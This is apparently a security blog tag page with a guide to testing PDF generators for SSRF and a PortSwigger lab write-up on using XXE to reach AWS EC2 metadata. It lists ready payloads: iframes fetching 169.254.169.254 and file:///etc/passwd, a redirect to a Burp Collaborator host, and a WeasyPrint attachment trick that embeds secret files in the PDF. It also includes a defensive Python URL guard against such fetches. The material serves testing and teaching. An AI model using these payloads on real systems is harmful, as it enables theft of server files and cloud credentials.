
Tag: SSRF

Testing for SSRF during PDF Generation


How to test for SSRF during PDF Generation?

User input is reflected in the PDF.

HTML elements are parsed by the PDF Generator Libraries.

Research the specific types of data that the target's PDF generator library parses in order to build a payload.

Payloads

If HTML is parsed directly:

Recon

<script>
  document.write(window.location.href); 
  document.write(window.location.hostname); 
  document.write(window.location.pathname); 
  document.write(window.location.protocol); 
  document.write(window.location.host); 
  document.write(window.location.port); 
</script>

Redirect with iframe

<iframe src="http://localhost/?redirect=http://xxxx.burpcollaborator.net/x.png">

AWS

<iframe src="http://169.254.169.254/user-data">

Files

<iframe src="file:///etc/passwd">

WeasyPrint PDF Test

Trying to embed a secret file in the PDF? You can try this payload if the target parses an HTML page. One option is to host the index HTML file on Heroku or a similar service and pass its URL to the target's PDF generation endpoint.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>WeasyPrint PDF Test</title>
    <link rel=attachment href="file:///{path_to_secret_file}">
</head>
<body>
    <h1>WeasyPrint PDF Test</h1>
</body>
</html>

In the PDF reader, open up the Attachment section and view the embedded file.
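From the defender's side, the iframe and file:// payloads above and the WeasyPrint attachment test all depend on the PDF generator fetching whatever URL appears in the HTML. As an added example (not from the original post and not WeasyPrint's own code), here is a standard-library guard that a generator's resource fetcher can run before loading any URL; `check_url`, `guarded_url_fetcher` and the `resolver` parameter are names chosen for this example, and `inner_fetcher` is assumed to be the generator's normal fetcher (for WeasyPrint that would be `weasyprint.default_url_fetcher`, passed in via its `url_fetcher` hook).

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Only plain web schemes may be fetched on behalf of user-supplied HTML;
# this rejects file://, gopher://, data: and friends before any I/O happens.
ALLOWED_SCHEMES = {"http", "https"}


def _resolve(host):
    # Return every address a name maps to: a name that has one public and
    # one internal record must be rejected as a whole, not on a lucky first hit.
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_url(url, resolver=_resolve):
    """Return None if `url` may be fetched, else a string saying why it was blocked."""
    parts = urlparse(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return f"scheme not allowed: {scheme or '(none)'}"
    host = parts.hostname  # already lower-cased, IPv6 brackets removed
    if not host:
        return "missing host"
    try:
        addrs = {str(ipaddress.ip_address(host))}  # literal IPv4/IPv6 address
    except ValueError:
        try:
            addrs = set(resolver(host))  # hostname: check every resolved address
        except OSError:
            return f"cannot resolve {host}"
    for addr in addrs:
        ip = ipaddress.ip_address(addr.split("%")[0])  # drop any IPv6 zone index
        if ip.version == 6 and ip.ipv4_mapped:
            ip = ip.ipv4_mapped  # e.g. ::ffff:169.254.169.254 -> 169.254.169.254
        # is_global is False for loopback, link-local (the 169.254.169.254
        # metadata range), RFC 1918, unspecified and reserved ranges.
        if not ip.is_global:
            return f"{host} resolves to non-public address {ip}"
    return None


def guarded_url_fetcher(url, inner_fetcher, resolver=_resolve, **kwargs):
    # Wrap the generator's fetcher. The inner fetcher must not follow redirects
    # silently; every Location target has to come back through check_url too.
    reason = check_url(url, resolver)
    if reason:
        raise ValueError(f"blocked resource {url!r}: {reason}")
    return inner_fetcher(url, **kwargs)
```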

Resources

https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf

Lab Write-up: Exploiting XXE to perform SSRF attacks

In this post, you will see how an XML external entity attack can be exploited to perform an SSRF. The lab can be found at this link (https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf).

The lab description mentions that the app server is running on an AWS EC2 instance. To retrieve metadata about the server, you will need to inject an external entity that calls this URL:
http://169.254.169.254/

The next thing to note is that the XML payload is posted to the server. Below is the screenshot:

If you change the Product ID value to a random string, you can see that the response shows the random string back. This means that you can inject the external entity into the Product ID field to retrieve the metadata.

Notice that when we change the product ID to ‘testing123’, the value is reflected back.

You will need to inject the external entity shown below into the XML payload:

The response will return ‘latest’. But what the hell is that? It took me a while to figure out that this is a folder name.

Now, when the URL is changed to ‘http://169.254.169.254/latest’, the value ‘metadata’ is returned.

Eventually, by appending each returned folder name to the URL in turn, you will reach the AWS EC2 metadata.